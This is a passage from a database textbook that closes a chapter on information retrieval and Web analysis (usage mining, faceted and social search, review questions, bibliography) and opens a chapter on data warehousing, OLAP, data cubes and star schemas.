the learning system generates rules—based on the learning pages—that are applied to extract target items from other Web pages. A fourth approach is the automatic approach, which aims to find patterns/grammars from the Web pages and then uses wrapper generation to produce a wrapper to extract data automatically. Web Information Integration. The Web is immense and has millions of docu- ments, authored by many different persons and organizations. Because of this, Web pages that contain similar information may have different syntax and different words that describe the same concepts. This creates the need for integrating 1021 Introduction to Information Retrieval and Web Search information from diverse Web pages. Two popular approaches for Web information integration are: 1. Web query interface integration, to enable querying multiple Web data- bases that are not visible in external interfaces and are hidden in the “deep Web.” The deep Web26 consists of those pages that do not exist until they are created dynamically as the result of a specific database search, which pro- duces some of the information in the page. Since traditional search engine crawlers cannot probe and collect information from such pages, the deep Web has heretofore been hidden from crawlers. 2. Schema matching, such as integrating directories and catalogs to come up with a global schema for applications. An example of such an application would be to combine a personal health record of an individual by matching and collecting data from various sources dynamically by cross-linking health records from multiple systems. These approaches remain an area of active research and a detailed discussion of them is beyond the scope of this book. Consult the Selected Bibliography at the end of this chapter for further details. Ontology-Based Information Integration. This task involves using ontologies to effectively combine information from multiple heterogeneous sources. Ontologies—formal models of representation with explicitly defined concepts and named relationships linking them—are used to address the issues of semantic het- erogeneity in data sources. Different classes of approaches are used for information integration using ontologies. ■ Single ontology approaches use one global ontology that provides a shared vocabulary for the specification of the semantics. They work if all informa- tion sources to be integrated provide nearly the same view on a domain of knowledge. For example, UMLS (described in Section 4.3) can serve as a common ontology for biomedical applications. ■ In a multiple ontology approach, each information source is described by its own ontology. In principle, the “source ontology” can be a combination of several other ontologies but it cannot be assumed that the different “source ontologies” share the same vocabulary. Dealing with multiple, partially over- lapping, and potentially conflicting ontologies is a very difficult problem faced by many applications, including those in bioinformatics and other complex area of knowledge. ■ Hybrid ontology approaches are similar to multiple ontology approaches: the semantics of each source is described by its own ontology. But in order to make the source ontologies comparable to each other, they are built upon one global shared vocabulary. The shared vocabulary contains basic terms (the primitives) of a domain of knowledge. Because each term of source 26The deep Web as defined by Bergman (2001). 1022 Introduction to Information Retrieval and Web Search ontology is based on the primitives, the terms become more easily compara- ble than in multiple ontology approaches. The advantage of a hybrid approach is that new sources can be easily added without the need to modify the mappings or the shared vocabulary. In multiple and hybrid approaches, several research issues, such as ontology mapping, alignment, and merging, need to be addressed. Building Concept Hierarchies. One common way of organizing search results is via a linear ranked list of documents. But for some users and applications, a better way to display results would be to create groupings of related documents in the search result. One way of organizing documents in a search result, and for organiz- ing information in general, is by creating a concept hierarchy. The documents in a search result are organized into groups in a hierarchical fashion. Other related tech- niques to organize docments are through classification and clustering. Clustering creates groups of documents, where the documents in each group share many com- mon concepts. Segmenting Web Pages and Detecting Noise. There are many superfluous parts in a Web document, such as advertisements and navigation panels. The infor- mation and text in these superfluous parts should be eliminated as noise before classifying the documents based on their content. Hence, before applying classifica- tion or clustering algorithms to a set of documents, the areas or blocks of the docu- ments that contain noise should be removed. 7.5 Approaches to Web Content Analysis The two main approaches to Web content analysis are (1) agent based (IR view) and (2) database based (DB view). The agent-based approach involves the development of sophisticated artificial intelligence systems that can act autonomously or semi-autonomously on behalf of a particular user, to discover and process Web-based information. Generally, the agent-based Web analysis systems can be placed into the following three categories: ■ Intelligent Web agents are software agents that search for relevant informa- tion using characteristics of a particular application domain (and possibly a user profile) to organize and interpret the discovered information. For example, an intelligent agent that retrieves product information from a vari- ety of vendor sites using only general information about the product domain. ■ Information Filtering/Categorization is another technique that utilizes Web agents for categorizing Web documents. These Web agents use methods from information retrieval, and semantic information based on the links among various documents to organize documents into a concept hierarchy. ■ Personalized Web agents are another type of Web agents that utilize the per- sonal preferences of users to organize search results, or to discover informa- tion and documents that could be of value for a particular user. User 1023 Introduction to Information Retrieval and Web Search preferences could be learned from previous user choices, or from other indi- viduals who are considered to have similar preferences to the user. The database-based approach aims to infer the structure of the Website or to trans- form a Web site to organize it as a database so that better information management and querying on the Web become possible. This approach of Web content analysis primarily tries to model the data on the Web and integrate it so that more sophisti- cated queries than keyword-based search can be performed. These could be achieved by finding the schema of Web documents, building a Web document ware- house, a Web knowledge base, or a virtual database. The database-based approach may use a model such as the Object Exchange Model (OEM)27 that represents semi- structured data by a labeled graph. The data in the OEM is viewed as a graph, with objects as the vertices and labels on the edges. Each object is identified by an object identifier and a value that is either atomic—such as integer, string, GIF image, or HTML document—or complex in the form of a set of object references. The main focus of the database-based approach has been with the use of multilevel databases and Web query systems. A multilevel database at its lowest level is a data- base containing primitive semistructured information stored in various Web repos- itories, such as hypertext documents. At the higher levels, metadata or generalizations are extracted from lower levels and organized in structured collec- tions such as relational or object-oriented databases. In a Web query system, infor- mation about the content and structure of Web documents is extracted and organized using database-like techniques. Query languages similar to SQL can then be used to search and query Web documents. They combine structural queries, based on the organization of hypertext documents, and content-based queries. 7.6 Web Usage Analysis Web usage analysis is the application of data analysis techniques to discover usage patterns from Web data, in order to understand and better serve the needs of Web- based applications. This activity does not directly contribute to information retrieval; but it is important to improve or enhance the users’ search experience. Web usage data describes the pattern of usage of Web pages, such as IP addresses, page references, and the date and time of accesses for a user, user group, or an appli- cation. Web usage analysis typically consists of three main phases: preprocessing, pattern discovery, and pattern analysis. 1. Preprocessing. Preprocessing converts the information collected about usage statistics and patterns into a form that can be utilized by the pattern discovery methods. We use the term “page view” to refer to pages viewed or visited by a user. There are several different types of preprocessing tech- niques available: ■ Usage preprocessing analyzes the available collected data about usage pat- terns of users, applications, and groups of users. Because this data is often incomplete, the process is difficult. Data cleaning techniques are necessary to 27See Kosala and Blockeel (2000). 1024 Introduction to Information Retrieval and Web Search eliminate the impact of irrelevant items in the analysis result. Frequently, usage data is identified by an IP address, and consists of clicking streams that are collected at the server. Better data is available if a usage tracking process is installed at the client site. ■ Content preprocessing is the process of converting text, image, scripts and other content into a form that can be used by the usage analysis. Often, this consists of performing content analysis such as classification or clustering. The clustering or classification techniques can group usage information for similar types of Web pages, so that usage patterns can be discovered for spe- cific classes of Web pages that describe particular topics. Page views can also be classified according to their intended use, such as for sales or for discovery or for other uses. ■ Structure preprocessing: The structure preprocessing can be done by pars- ing and reformatting the information about hyperlinks and structure between viewed pages. One difficulty is that the site structure may be dynamic and may have to be constructed for each server session. 2. Pattern Discovery The techniques that are used in pattern discovery are based on methods from the fields of statistics, machine learning, pattern recognition, data analysis, data mining, and other similar areas. These techniques are adapted so they take into consideration the specific knowledge and characteristics for Web Analysis. For example, in association rule discovery, the notion of a transaction for market-basket analysis considers the items to be unordered. But the order of accessing of Web pages is important, and so it should be considered in Web usage analysis. Hence, pattern discovery involves mining sequences of page views. In general, using Web usage data, the following types of data mining activities may be performed for pattern discovery. ■ Statistical analysis. Statistical techniques are the most common method to extract knowledge about visitors to a Website. By analyzing the session log, it is possible to apply statistical measures such as mean, median, and frequency count to parameters such as pages viewed, viewing time per page, length of navigation paths between pages, and other parameters that are relevant to Web usage analysis. ■ Association rules. In the context of Web usage analysis, association rules refer to sets of pages that are accessed together with a support value exceed- ing some specified threshold. These pages may not be directly connected to one another via hyperlinks. For example, association rule discovery may reveal a correlation between users who visited a page containing electronic products to those who visit a page about sporting equipment. ■ Clustering. In the Web usage domain, there are two kinds of interesting clusters to be discovered: usage clusters and page clusters. Clustering of users tends to establish groups of users exhibiting similar browsing patterns. 1025 Introduction to Information Retrieval and Web Search Such knowledge is especially useful for inferring user demographics in order to perform market segmentation in E-commerce applications or provide personalized Web content to the users. Clustering of pages is based on the content of the pages, and pages with similar contents are grouped together. This type of clustering can be utilized in Internet search engines, and in tools that provide assistance to Web browsing. ■ Classification. In the Web domain, one goal is to develop a profile of users belonging to a particular class or category. This requires extraction and selection of features that best describe the properties of a given class or cate- gory of users. As an example, an interesting pattern that may be discovered would be: 60% of users who placed an online order in /Product/Books are in the 18-25 age group and live in rented apartments. ■ Sequential patterns. These kinds of patterns identify sequences of Web accesses, which may be used to predict the next set of Web pages to be accessed by a certain class of users. These patterns can be used by marketers to produce targeted advertisements on Web pages. Another type of sequen- tial pattern pertains to which items are typically purchased following the purchase of a particular item. For example, after purchasing a computer, a printer is often purchased ■ Dependency modeling. Dependency modeling aims to determine and model significant dependencies among the various variables in the Web domain. As an example, one may be interested to build a model representing the different stages a visitor undergoes while shopping in an online store based on the actions chosen (e.g., from a casual visitor to a serious potential buyer). 3. Pattern Analysis The final step is to filter out those rules or patterns that are considered to be not of interest from the discovered patterns. The particular analysis method- ology based on the application. One common technique for pattern analysis is to use a query language such as SQL to detect various patterns and rela- tionships. Another technique involves loading of usage data into a data ware- house with ETL tools and performing OLAP operations to view it along multiple dimensions. It is common to use visualization techniques, such as graphing patterns or assigning colors to different values, to highlight pat- terns or trends in the data. 7.7 Practical Applications of Web Analysis Web Analytics. The goal of web analytics is to understand and optimize the per- formance of Web usage. This requires collecting, analyzing, and performance mon- itoring of Internet usage data. On-site Web analytics measures the performance of a Website in a commercial context. This data is typically compared against key per- formance indicators to measure effectiveness or performance of the Website as a whole, and can be used to improve a Website or improve the marketing strategies. 1026 Introduction to Information Retrieval and Web Search Web Spamming. It has become increasingly important for companies and indi- viduals to have their Websites/Web pages appear in the top search results. To achieve this, it is essential to understand search engine ranking algorithms and to present the information in one’s page in such a way that the page is ranked high when the respective keywords are queried. There is a thin line separating legitimate page opti- mization for business purposes and spamming. Web Spamming is thus defined as a deliberate activity to promote one’s page by manipulating the results returned by the search engines. Web analysis may be used to detect such pages and discard them from search results. Web Security. Web analysis can be used to find interesting usage patterns of Websites. If any flaw in a Website has been exploited, it can be inferred using Web analysis thereby allowing the design of more robust Websites. For example, the backdoor or information leak of Web servers can be detected by using Web analysis techniques on some abnormal Web application log data. Security analysis tech- niques such as intrusion detection and denial of service attacks are based on Web access pattern analysis. Web Crawlers. Web crawlers are programs that visit Web pages and create copies of all the visited pages so they can be processed by a search engine for indexing the downloaded pages to provide fast searches. Another use of crawlers is to automati- cally check and maintain the Websites. For example, the HTML code and the links in a Website can be checked and validated by the crawler. Another unfortunate use of crawlers is to collect e-mail addresses from Web pages, so they can be used for spam e-mails later. 8 Trends in Information Retrieval In this section we review a few concepts that are being considered in more recent research work in information retrieval. 8.1 Faceted Search Faceted Search is a technique that allows for integrated search and navigation expe- rience by allowing users to explore by filtering available information. This search technique is used often in ecommerce Websites and applications enabling users to navigate a multi-dimensional information space. Facets are generally used for han- dling three or more dimensions of classification. This allows the faceted classifica- tion scheme to classify an object in various ways based on different taxonomical criteria. For example, a Web page may be classified in various ways: by content (air- lines, music, news, ...); by use (sales, information, registration, ...); by location; by language used (HTML, XML, ...) and in other ways or facets. Hence, the object can be classified in multiple ways based on multiple taxonomies. A facet defines properties or characteristics of a class of objects. The properties should be mutually exclusive and exhaustive. For example, a collection of art objects might be classified using an artist facet (name of artist), an era facet (when the art 1027 Introduction to Information Retrieval and Web Search was created), a type facet (painting, sculpture, mural, ...), a country of origin facet, a media facet (oil, watercolor, stone, metal, mixed media, ...), a collection facet (where the art resides), and so on. Faceted search uses faceted classification that enables a user to navigate information along multiple paths corresponding to different orderings of the facets. This con- trasts with traditional taxonomies in which the hierarchy of categories is fixed and unchanging. University of California, Berkeley’s Flamenco project28 is one of the earlier examples of a faceted search system. 8.2 Social Search The traditional view of Web navigation and browsing assumes that a single user is searching for information. This view contrasts with previous research by library sci- entists who studied users’ information seeking habits. This research demonstrated that additional individuals may be valuable information resources during informa- tion search by a single user. More recently, research indicates that there is often direct user cooperation during Web-based information search. Some studies report that significant segments of the user population are engaged in explicit collabora- tion on joint search tasks on the Web. Active collaboration by multiple parties also occur in certain cases (for example, enterprise settings); at other times, and perhaps for a majority of searches, users often interact with others remotely, asynchronously, and even involuntarily and implicitly. Socially enabled online information search (social search) is a new phenomenon facilitated by recent Web technologies. Collaborative social search involves different ways for active involvement in search-related activities such as co-located search, remote collaboration on search tasks, use of social network for search, use of exper- tise networks, involving social data mining or collective intelligence to improve the search process and even social interactions to facilitate information seeking and sense making. This social search activity may be done synchronously, asynchronously, co- located or in remote shared workspaces. Social psychologists have experimentally val- idated that the act of social discussions has facilitated cognitive performance. People in social groups can provide solutions (answers to questions), pointers to databases or to other people (meta-knowledge), validation and legitimization of ideas, and can serve as memory aids and help with problem reformulation. Guided participation is a process in which people co-construct knowledge in concert with peers in their com- munity. Information seeking is mostly a solitary activity on the Web today. Some recent work on collaborative search reports several interesting findings and the potential of this technology for better information access. 8.3 Conversational Search Conversational Search (CS) is an interactive and collaborative information finding interaction. The participants engage in a conversation and perform a social search activity that is aided by intelligent agents. The collaborative search activity helps the 28Yee (2003) describes faceted metadata for image search. 1028 Introduction to Information Retrieval and Web Search agent learn about conversations with interactions and feedback from participants. It uses the semantic retrieval model with natural language understanding to provide the users with faster and relevant search results. It moves search from being a soli- tary activity to being a more participatory activity for the user. The search agent performs multiple tasks of finding relevant information and connecting the users together; participants provide feedback to the agent during the conversations that allows the agent to perform better. 9 Summary In this chapter we covered an important area called information retrieval (IR) that is closely related to databases. With the advent of the Web, unstructured data with text, images, audio, and video is proliferating at phenomenal rates. While database management systems have a very good handle on structured data, the unstructured data containing a variety of data types is being stored mainly on ad hoc information repositories on the Web that are available for consumption primarily via IR systems. Google, Yahoo, and similar search engines are IR systems that make the advances in this field readily available for the average end-user, giving them a richer search expe- rience with continuous improvement. We started by defining the basic terminology of IR, presented the query and brows- ing modes of interaction in IR systems, and provided a comparison of the IR and database technologies. We presented schematics of the IR process at a detailed and an overview level, and then discussed digital libraries, which are repositories of tar- geted content on the Web for academic institutions as well as professional commu- nities, and gave a brief history of IR. We presented the various retrieval models including Boolean, vector space, proba- bilistic, and semantic models. They allow for a measurement of whether a docu- ment is relevant to a user query and provide similarity measurement heuristics. We then discussed various evaluation metrics such as recall and precision and F-score to measure the goodness of the results of IR queries. Then we presented different types of queries—besides keyword-based queries, which dominate, there are other types including Boolean, phrase, proximity, natural language, and others for which explicit support needs to be provided by the retrieval model. Text preprocessing is important in IR systems, and various activities like stopword removal, stemming, and the use of thesauruses were discussed. We then discussed the construction and use of inverted indexes, which are at the core of IR systems and contribute to factors involving search efficiency. Relevance feedback was briefly addressed—it is impor- tant to modify and improve the retrieval of pertinent information for the user through his interaction and engagement in the search process. We did a somewhat detailed introduction to analysis of the Web as it relates to information retrieval. We divided this treatment into the analysis of content, struc- ture, and usage of the Web. Web search was discussed, including an analysis of the Web link structure, followed by an introduction to algorithms for ranking the results from a Web search such as PageRank and HITS. Finally, we briefly discussed 1029 Introduction to Information Retrieval and Web Search current trends, including faceted search, social search, and conversational search. This is an introductory treatment of a vast field and the reader is referred to special- ized textbooks on information retrieval and search engines. Review Questions 1. What is structured data and unstructured data? Give an example of each from your experience with data that you may have used. 2. Give a general definition of information retrieval (IR). What does informa- tion retrieval involve when we consider information on the Web? 3. Discuss the types of data and the types of users in today’s information retrieval systems. 4. What is meant by navigational, informational, and transformational search? 5. What are the two main modes of interaction with an IR system? Describe with examples. 6. Explain the main differences between database and IR systems mentioned in Table 1. 7. Describe the main components of the IR system as shown in Figure 1. 8. What are digital libraries? What types of data are typically found in them? 9. Name some digital libraries that you have accessed. What do they contain and how far back does the data go? 10. Give a brief history of IR and mention the landmark developments. 11. What is the Boolean model of IR? What are its limitations? 12. What is the vector space model of IR? How does a vector get constructed to represent a document? 13. Define the TF-IDF scheme of determining the weight of a keyword in a document. What is the necessity of including IDF in the weight of a term? 14. What are probabilistic and semantic models of IR? 15. Define recall and precision in IR systems. 16. Give the definition of precision and recall in a ranked list of results at position i. 17. How is F-score defined as a metric of information retrieval? In what way does it account for both precision and recall? 18. What are the different types of queries in an IR system? Describe each with an example. 19. What are the approaches to processing phrase and proximity queries? 1030 Introduction to Information Retrieval and Web Search 20. Describe the detailed IR process shown in Figure 2. 21. What is stopword removal and stemming? Why are these processes necessary for better information retrieval? 22. What is a thesaurus? How is it beneficial to IR? 23. What is information extraction? What are the different types of information extraction from structured text? 24. What are vocabularies in IR systems? What role do they play in the indexing of documents? 25. Take five documents with about three sentences each with some related con- tent. Construct an inverted index of all important stems (keywords) from these documents. 26. Describe the process of constructing the result of a search request using an inverted index. 27. Define relevance feedback. 28. Describe the three types of Web analyses discussed in this chapter. 29. List the important tasks mentioned that are involved in analyzing Web con- tent. Describe each in a couple of sentences. 30. What are the three categories of agent-based Web content analyses men- tioned in this chapter? 31. What is the database-based approach to analyzing Web content? What are Web query systems? 32. What algorithms are popular in ranking or determining the importance of Web pages? Which algorithm was proposed by the founders of Google? 33. What is the basic idea behind the PageRank algorithm? 34. What are hubs and authority pages? How does the HITS algorithm use these concepts? 35. What can you learn from Web usage analysis? What data does it generate? 36. What mining operations are commonly performed on Web usage data? Give an example of each. 37. What are the applications of Web usage mining? 38. What is search relevance? How is it determined? 39. Define faceted search. Make up a set of facets for a database containing all types of buildings. For example, two facets could be “building value or price” and “building type (residential, office, warehouse, factory, and so on)”. 40. What is social search? What does collaborative social search involve? 41. Define and explain conversational search. 1031 Introduction to Information Retrieval and Web Search Selected Bibliography Information retrieval and search technologies are active areas of research and devel- opment in industry and academia. There are many IR textbooks that provide detailed discussion on the materials that we have briefly introduced in this chapter. A recent book entitled Search Engines: Information Retrieval in Practice by Croft, Metzler, and Strohman (2009) gives a practical overview of search engine concepts and principles. Introduction to Information Retrieval by Manning, Raghavan, and Schutze (2008) is an authoritative book on information retrieval. Another introduc- tory textbook in IR is Modern Information Retrieval by Ricardo Baeza-Yates and Berthier Ribeiro-Neto (1999), which provides detailed coverage of various aspects of IR technology. Gerald Salton’s (1968) and van Rijsbergen’s (1979) classic books on information retrieval provide excellent descriptions of the foundational research done in the IR field until the late 1960s. Salton also introduced the vector space model as a model of IR. Manning and Schutze (1999) provide a good summary of natural language technologies and text preprocessing. “Interactive Information Retrieval in Digital Environments” by Xie (2008) provides a good human-centered approach to information retrieval. The book Managing Gigabytes by Witten, Moffat, and Bell (1999) provides detailed discussions for indexing techniques. The TREC book by Voorhees and Harman (2005) provides a description of test collection and evaluation procedures in the context of TREC competitions. Broder (2002) classifies Web queries into three distinct classes—navigational, infor- mational, and transactional—and presents a detailed taxonomy of Web search. Covi and Kling (1996) give a broad definition for digital libraries in their paper and dis- cuss organizational dimensions of effective digital library use. Luhn (1957) did some seminal work in IR at IBM in the 1950s on autoindexing and business intelligence that received a lot of attention at that time. The SMART system (Salton et al. (1993)), developed at Cornell, was one of the earliest advanced IR systems that used fully automatic term indexing, hierarchical clustering, and document ranking by degree of similarity to the query. The SMART system represented documents and queries as weighted term vectors according to the vector space model. Porter (1980) is credited with the weak and strong stemming algorithms that have become standards. Robertson (1997) developed a sophisticated weighting scheme in the City University of London Okapi system that became very popular in TREC competitions. Lenat (1995) started the Cyc project in the 1980s for incorporating formal logic and knowl- edge bases in information processing systems. Efforts toward creating the WordNet thesaurus continued in the 1990s, and are still ongoing. WordNet concepts and prin- ciples are described in the book by Fellbaum (1998). Rocchio (1971) describes the relevance feedback algorithm, which is described in Salton’s (1971) book on The SMART Retrieval System–Experiments in Automatic Document Processing. Abiteboul, Buneman, and Suciu (1999) provide an extensive discussion of data on the Web in their book that emphasizes semistructured data. Atzeni and Mendelzon (2000) wrote an editorial in the VLDB journal on databases and the Web. Atzeni et al. (2002) propose models and transformations for Web-based data. Abiteboul et al. (1997) propose the Lord query language for managing semistructured data. 1032 Introduction to Information Retrieval and Web Search Chakrabarti (2002) is an excellent book on knowledge discovery from the Web. The book by Liu (2006) consists of several parts, each providing a comprehensive overview of the concepts involved with Web data analysis and its applications. Excellent survey articles on Web analysis include Kosala and Blockeel (2000) and Liu et al. (2004). Etzioni (1996) provides a good starting point for understanding Web mining and describes the tasks and issues related with the World Wide Web. An excellent overview of the research issues, techniques, and development efforts asso- ciated with Web content and usage analysis is presented by Cooley et al. (1997). Cooley (2003) focuses on mining Web usage patterns through the use of Web struc- ture. Spiliopoulou (2000) describes Web usage analysis in detail. Web mining based on page structure is described in Madria et al. (1999) and Chakraborti et al. (1999). Algorithms to compute the rank of a Web page are given by Page et al. (1999), who describe the famous PageRank algorithm, and Kleinberg (1998), who presents the HITS algorithm. 1033 Overview of Data Warehousing and OLAP The increasing processing power and sophisticationof analytical tools and techniques have resulted in the development of what are known as data warehouses. These data warehouses provide storage, functionality, and responsiveness to queries beyond the capabilities of transaction-oriented databases. Accompanying this ever-increasing power is a great demand to improve the data access performance of databases. Traditional databases balance the requirement of data access with the need to ensure data integrity. In modern organizations, users of data are often completely removed from the data sources. Many people only need read-access to data, but still need fast access to a larger volume of data than can conveniently be downloaded to the desk- top. Often such data comes from multiple databases. Because many of the analyses performed are recurrent and predictable, software vendors and systems support staff are designing systems to support these functions. Presently there is a great need to provide decision makers from middle management upward with information at the correct level of detail to support decision making. Data warehousing, online ana- lytical processing (OLAP), and data mining provide this functionality. In this chapter we give a broad overview of data warehousing and OLAP technologies. 1 Introduction, Definitions, and Terminology A database is a collection of related data and a database system is a database and database software together. A data warehouse is also a collection of information as well as a supporting system. However, a clear distinction exists. Traditional From Chapter 29 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison- Wesley. All rights reserved. 1034 Overview of Data Warehousing and OLAP databases are transactional (relational, object-oriented, network, or hierarchical). Data warehouses have the distinguishing characteristic that they are mainly intended for decision-support applications. They are optimized for data retrieval, not routine transaction processing. Because data warehouses have been developed in numerous organizations to meet particular needs, there is no single, canonical definition of the term data warehouse. Professional magazine articles and books in the popular press have elaborated on the meaning in a variety of ways. Vendors have capitalized on the popularity of the term to help market a variety of related products, and consultants have provided a large variety of services, all under the data warehousing banner. However, data warehouses are quite distinct from traditional databases in their structure, func- tioning, performance, and purpose. W. H. Inmon1 characterized a data warehouse as a subject-oriented, integrated, non- volatile, time-variant collection of data in support of management’s decisions. Data warehouses provide access to data for complex analysis, knowledge discovery, and decision making. They support high-performance demands on an organization’s data and information. Several types of applications—OLAP, DSS, and data mining applications—are supported. We define each of these next. OLAP (online analytical processing) is a term used to describe the analysis of com- plex data from the data warehouse. In the hands of skilled knowledge workers, OLAP tools use distributed computing capabilities for analyses that require more storage and processing power than can be economically and efficiently located on an individual desktop. DSS (decision-support systems), also known as EIS—executive information sys- tems; not to be confused with enterprise integration systems—support an organiza- tion’s leading decision makers with higher-level data for complex and important decisions. Data mining is used for knowledge discovery, the process of searching data for unanticipated new knowledge. Traditional databases support online transaction processing (OLTP), which includes insertions, updates, and deletions, while also supporting information query requirements. Traditional relational databases are optimized to process queries that may touch a small part of the database and transactions that deal with insertions or updates of a few tuples per relation to process. Thus, they cannot be optimized for OLAP, DSS, or data mining. By contrast, data warehouses are designed precisely to support efficient extraction, processing, and presentation for analytic and decision-making purposes. In comparison to traditional databases, data warehouses generally contain very large amounts of data from multiple sources that may include databases from different data models and sometimes files acquired from independent systems and platforms. 1Inmon (1992) is credited with initially using the term warehouse. The latest edition of his work is Inmon (2005). 1035 Overview of Data Warehousing and OLAP Databases Cleaning Backflushing Reformatting Data mining DSS EIS OLAP Other data inputs Updates/new data Metadata Data Data warehouse Figure 1 Sample transactions in market-basket model. 2 Characteristics of Data Warehouses To discuss data warehouses and distinguish them from transactional databases calls for an appropriate data model. The multidimensional data model (explained in more detail in Section 3) is a good fit for OLAP and decision-support technologies. In contrast to multidatabases, which provide access to disjoint and usually heteroge- neous databases, a data warehouse is frequently a store of integrated data from mul- tiple sources, processed for storage in a multidimensional model. Unlike most transactional databases, data warehouses typically support time-series and trend analysis, both of which require more historical data than is generally maintained in transactional databases. Compared with transactional databases, data warehouses are nonvolatile. This means that information in the data warehouse changes far less often and may be regarded as non–real-time with periodic updating. In transactional systems, transac- tions are the unit and are the agent of change to the database; by contrast, data ware- house information is much more coarse-grained and is refreshed according to a careful choice of refresh policy, usually incremental. Warehouse updates are handled by the warehouse’s acquisition component that provides all required preprocessing. We can also describe data warehousing more generally as a collection of decision sup- port technologies, aimed at enabling the knowledge worker (executive, manager, ana- lyst) to make better and faster decisions.2 Figure 1 gives an overview of the conceptual structure of a data warehouse. It shows the entire data warehousing process, which includes possible cleaning and reformatting of data before loading it into the ware- house. This process is handled by tools known as ETL (extraction, transformation, and loading) tools. At the back end of the process, OLAP, data mining, and DSS may generate new relevant information such as rules; this information is shown in the figure going back into the warehouse. The figure also shows that data sources may include files. 2Chaudhuri and Dayal (1997) provide an excellent tutorial on the topic, with this as a starting definition. 1036 Overview of Data Warehousing and OLAP Data warehouses have the following distinctive characteristics:3 ■ Multidimensional conceptual view ■ Generic dimensionality ■ Unlimited dimensions and aggregation levels ■ Unrestricted cross-dimensional operations ■ Dynamic sparse matrix handling ■ Client-server architecture ■ Multiuser support ■ Accessibility ■ Transparency ■ Intuitive data manipulation ■ Consistent reporting performance ■ Flexible reporting Because they encompass large volumes of data, data warehouses are generally an order of magnitude (sometimes two orders of magnitude) larger than the source databases. The sheer volume of data (likely to be in terabytes or even petabytes) is an issue that has been dealt with through enterprise-wide data warehouses, virtual data warehouses, and data marts: ■ Enterprise-wide data warehouses are huge projects requiring massive investment of time and resources. ■ Virtual data warehouses provide views of operational databases that are materialized for efficient access. ■ Data marts generally are targeted to a subset of the organization, such as a department, and are more tightly focused. 3 Data Modeling for Data Warehouses Multidimensional models take advantage of inherent relationships in data to popu- late data in multidimensional matrices called data cubes. (These may be called hypercubes if they have more than three dimensions.) For data that lends itself to dimensional formatting, query performance in multidimensional matrices can be much better than in the relational data model. Three examples of dimensions in a corporate data warehouse are the corporation’s fiscal periods, products, and regions. A standard spreadsheet is a two-dimensional matrix. One example would be a spreadsheet of regional sales by product for a particular time period. Products could be shown as rows, with sales revenues for each region comprising the columns. (Figure 2 shows this two-dimensional organization.) Adding a time dimension, 3Codd and Salley (1993) coined the term OLAP and mentioned these characteristics. We have reordered their original list. 1037 Overview of Data Warehousing and OLAP Reg 1 P123 P124 P125 P126 Region P ro d u ct Reg 2 Reg 3 Figure 2 A two-dimensional matrix model. such as an organization’s fiscal quarters, would produce a three-dimensional matrix, which could be represented using a data cube. Figure 3 shows a three-dimensional data cube that organizes product sales data by fiscal quarters and sales regions. Each cell could contain data for a specific product, P126 P127 P ro d uc t P125 P124 P123 Reg 1 Reg 2 Region Reg 3 Qtr 1 Qtr 2Fis cal_ qua rter Qtr 3 Qtr 4 Figure 3 A three-dimensional data cube model. 1038 Overview of Data Warehousing and OLAP Reg 4 R eg io n Reg 3 Reg 2 Reg 1 Qtr 1 Qtr 2 Fiscal quarter Qtr 3 Qtr 4 P 1 23 P 1 24 Pro duc t P 1 25 P 1 26 P 1 27Figure 4 Pivoted version of the data cube from Figure 3. specific fiscal quarter, and specific region. By including additional dimensions, a data hypercube could be produced, although more than three dimensions cannot be eas- ily visualized or graphically presented. The data can be queried directly in any com- bination of dimensions, bypassing complex database queries. Tools exist for viewing data according to the user’s choice of dimensions. Changing from one-dimensional hierarchy (orientation) to another is easily accom- plished in a data cube with a technique called pivoting (also called rotation). In this technique the data cube can be thought of as rotating to show a different orienta- tion of the axes. For example, you might pivot the data cube to show regional sales revenues as rows, the fiscal quarter revenue totals as columns, and the company’s products in the third dimension (Figure 4). Hence, this technique is equivalent to having a regional sales table for each product separately, where each table shows quarterly sales for that product region by region. Multidimensional models lend themselves readily to hierarchical views in what is known as roll-up display and drill-down display. A roll-up display moves up the hierarchy, grouping into larger units along a dimension (for example, summing weekly data by quarter or by year). Figure 5 shows a roll-up display that moves from individual products to a coarser-grain of product categories. Shown in Figure 6, a drill-down display provides the opposite capability, furnishing a finer-grained view, perhaps disaggregating country sales by region and then regional sales by sub- region and also breaking up products by styles. 1039 Overview of Data Warehousing and OLAP Products 1XX Products 2XX Products 3XX Products 4XX Region P ro d uc t ca te g o rie s Region 1 Region 2 Region 3 Figure 5 The roll-up operation. The multidimensional storage model involves two types of tables: dimension tables and fact tables. A dimension table consists of tuples of attributes of the dimension. A fact table can be thought of as having tuples, one per a recorded fact. This fact contains some measured or observed variable(s) and identifies it (them) with point- ers to dimension tables. The fact table contains the data, and the dimensions iden- tify each tuple in that data. Figure 7 contains an example of a fact table that can be viewed from the perspective of multiple dimension tables. Two common multidimensional schemas are the star schema and the snowflake schema. The star schema consists of a fact table with a single table for each dimen- sion (Figure 7). The snowflake schema is a variation on the star schema in which A B C D P123 Styles P124 Styles P125 Styles A B C A B C D Sub_reg 1 Sub_reg 2 Region 1 Region 2 Sub_reg 3 Sub_reg 4 Sub_reg 1 Figure 6 The drill-down operation. 1040 Overview of Data Warehousing and OLAP Dimension table Product Prod_no Prod_name Prod_descr Prod_style Prod_line Fact table Business results Product Quarter Region Sales_revenue Dimension table Fiscal quarter Qtr Year Beg_date End_date Dimension table Region Subregion Figure 7 A star schema with fact and dimensional tables. Dimension tables Pname Prod_name Prod_descr Product Prod_no Prod_name Style Prod_line_no Fact table Business results Product Quarter Region Revenue Pline Prod_line_no Prod_line_name Dimension tables Fiscal quarter Qtr Year Beg_date FQ dates Beg_date End_date Sales revenue Region Subregion Figure 8 A snowflake schema. the dimensional tables from a star schema are organized into a hierarchy by normal- izing them (Figure 8). Some installations are normalizing data warehouses up to the third normal form so that they can access the data warehouse to the finest level of detail. A fact constellation is a set of fact tables that share some dimension tables. Figure 9 shows a fact constellation with two fact tables, business results and business forecast. These share the dimension table called product. Fact constellations limit the possible queries for the warehouse. Data warehouse storage also utilizes indexing techniques to support high- performance access. A technique called bitmap indexing constructs a bit vector for each value in a domain (column) being indexed. It works very well for domains of 1041 Overview of Data Warehousing and OLAP Fact table I Business results Prod_no Prod_name Prod_descr Prod_style Prod_line Dimension table Product Product Quarter Region Revenue Fact table II Business forecast Product Future_qtr Region Projected_revenue Figure 9 A fact constellation. low cardinality. There is a 1 bit placed in the jth position in the vector if the jth row contains the value being indexed. For example, imagine an inventory of 100,000 cars with a bitmap index on car size. If there are four car sizes—economy, compact, mid-size, and full-size—there will be 